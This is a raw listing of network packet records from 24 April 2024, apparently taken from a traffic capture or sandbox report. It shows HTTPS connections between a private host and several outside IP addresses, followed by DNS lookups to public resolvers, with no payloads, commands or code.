                                                                                                                                      Apr 24, 2024 12:14:25.315984011 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.316021919 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.316023111 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.316045046 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.316664934 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.316673994 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.316684008 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.316723108 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.316734076 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.316745996 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.316773891 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.324889898 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.325716019 CEST49923443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:25.361562014 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.368140936 CEST4434992331.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.368163109 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.610713005 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.610723019 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.610774040 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.610816002 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.610848904 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.610858917 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.610892057 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.610915899 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.611846924 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.611854076 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.611886978 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.611900091 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.611908913 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.611927032 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.611949921 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.611954927 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.611991882 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.612755060 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.612801075 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.612835884 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.612840891 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.612879992 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.619888067 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.663556099 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.701672077 CEST4434992331.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.701771975 CEST4434992331.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.701844931 CEST49923443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:25.702334881 CEST49923443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:25.702372074 CEST4434992331.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.704092026 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.704145908 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.704229116 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.704493999 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.704510927 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.905241966 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.905322075 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.905405998 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.905456066 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.905488014 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.905517101 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.906161070 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.906203985 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.906241894 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.906260967 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.906291962 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.906310081 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.906999111 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.907042980 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.907075882 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.907087088 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.907113075 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.907131910 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.907143116 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.907588959 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.907665968 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.907665968 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.907701015 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.907725096 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.907743931 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.907838106 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.908000946 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.908004999 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.908027887 CEST44349921153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.908060074 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.908091068 CEST49921443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.914659977 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.914670944 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.914733887 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.914735079 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.914772987 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.914799929 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.914808035 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.914819956 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.914828062 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.914859056 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.915421963 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.915429115 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.915472984 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.915501118 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.915508032 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.915513992 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:25.915524006 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:25.915549994 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.209121943 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.209134102 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.209214926 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.209255934 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.209276915 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.209306002 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.209333897 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.209851980 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.209867954 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.209934950 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.209943056 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.209985018 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.210726023 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.210741043 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.210802078 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.210808992 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.210850954 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.301459074 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.301754951 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.301764011 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.302222013 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.302726984 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.302813053 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.302917004 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.344120979 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.503447056 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.503462076 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.503516912 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.503549099 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.503565073 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.503603935 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.503624916 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.504194975 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.504219055 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.504293919 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.504302979 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.504342079 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.504964113 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.504991055 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.505059004 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.505069971 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.505105972 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.505997896 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.506014109 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.506078005 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.506086111 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.506122112 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.506871939 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.506887913 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.506951094 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.506958008 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.507002115 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.507575035 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.507591009 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.507654905 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.507663965 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.507699966 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797367096 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.797379971 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.797441959 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.797483921 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797496080 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.797530890 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797550917 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797702074 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.797755957 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.797764063 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797801018 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797888994 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797899961 CEST44349922153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.797930002 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.797949076 CEST49922443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:26.816220999 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:26.816248894 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.816320896 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:26.816700935 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:26.816709995 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.816762924 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:26.818073034 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:26.818084002 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.818278074 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:26.818288088 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.818711042 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:26.818728924 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:26.818785906 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:26.818950891 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:26.818962097 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.054980040 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.102581024 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:27.102605104 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.103940010 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:27.104010105 CEST44349927153.92.6.142192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.104084969 CEST49927443192.168.2.16153.92.6.142
                                                                                                                                      Apr 24, 2024 12:14:27.422034979 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.422324896 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:27.422337055 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.423785925 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.423854113 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:27.424132109 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:27.424196005 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.424278021 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:27.424283981 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.469567060 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:27.521505117 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.521897078 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:27.521909952 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.523051023 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.523086071 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.523235083 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:27.523255110 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.523464918 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:27.523593903 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:27.523638964 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.523715973 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.523993015 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:27.524069071 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:27.524075985 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:27.565588951 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:27.565597057 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:28.275688887 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:28.275799990 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:28.275899887 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:28.276736975 CEST49929443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:28.276752949 CEST4434992931.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:28.280250072 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:28.280344963 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:28.280401945 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:28.280823946 CEST49930443192.168.2.1631.41.44.109
                                                                                                                                      Apr 24, 2024 12:14:28.280833960 CEST4434993031.41.44.109192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:32.153521061 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:32.197544098 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      Apr 24, 2024 12:14:32.197563887 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:32.198724985 CEST44349928185.158.251.240192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:32.198779106 CEST49928443192.168.2.16185.158.251.240
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Apr 24, 2024 12:12:26.633270025 CEST5520453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:12:26.633474112 CEST6531253192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:12:26.784513950 CEST53552231.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:26.791277885 CEST53554211.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:27.503508091 CEST53552041.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:27.782969952 CEST53593801.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:28.006619930 CEST53653121.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.343492031 CEST5361353192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:12:31.343585968 CEST6410653192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:12:31.497124910 CEST53536131.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:31.497149944 CEST53641061.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:39.864927053 CEST5835153192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:12:39.865257025 CEST5335253192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:12:40.018591881 CEST53533521.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:40.018759012 CEST53583511.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:12:44.792197943 CEST53496681.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:03.754267931 CEST53533691.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:17.711821079 CEST6071353192.168.2.168.8.8.8
                                                                                                                                      Apr 24, 2024 12:13:17.712073088 CEST5691453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:17.865401983 CEST53569141.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:17.882525921 CEST53607138.8.8.8192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:24.353991032 CEST6189653192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:24.354131937 CEST5935353192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:24.799015999 CEST53593531.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:24.804990053 CEST53618961.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:26.055840015 CEST5694353192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:26.056628942 CEST6385753192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:26.056628942 CEST5204653192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:26.056862116 CEST6153053192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:26.209713936 CEST53569431.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:26.209949017 CEST53615301.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:26.209965944 CEST53520461.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:26.210288048 CEST53638571.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:26.297966957 CEST53578331.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:26.657241106 CEST53594941.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:27.165281057 CEST6001553192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:27.165446043 CEST5574953192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:27.182948112 CEST6471253192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:27.183132887 CEST5522553192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:27.319452047 CEST53600151.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:27.319510937 CEST53557491.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:27.336849928 CEST53647121.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:27.336909056 CEST53552251.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:28.177676916 CEST5239053192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:28.177789927 CEST5805453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:28.330717087 CEST53538721.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:28.331660986 CEST53637071.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:29.221296072 CEST53612351.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:31.859462976 CEST53533601.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:33.806669950 CEST53652491.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:36.343451023 CEST138138192.168.2.16192.168.2.255
                                                                                                                                      Apr 24, 2024 12:13:48.697887897 CEST6221453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:48.698056936 CEST5135853192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:48.851244926 CEST53513581.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:48.851265907 CEST53622141.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:55.475029945 CEST53621761.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:59.629976034 CEST5017753192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:59.630105972 CEST4917553192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:13:59.964988947 CEST53501771.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:13:59.997740030 CEST53491751.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:01.687583923 CEST5407253192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:01.687724113 CEST6140953192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:01.835212946 CEST53636741.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:01.841665030 CEST53540721.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:01.972642899 CEST6172153192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:01.972810984 CEST5437753192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:02.020724058 CEST53614091.1.1.1192.168.2.16
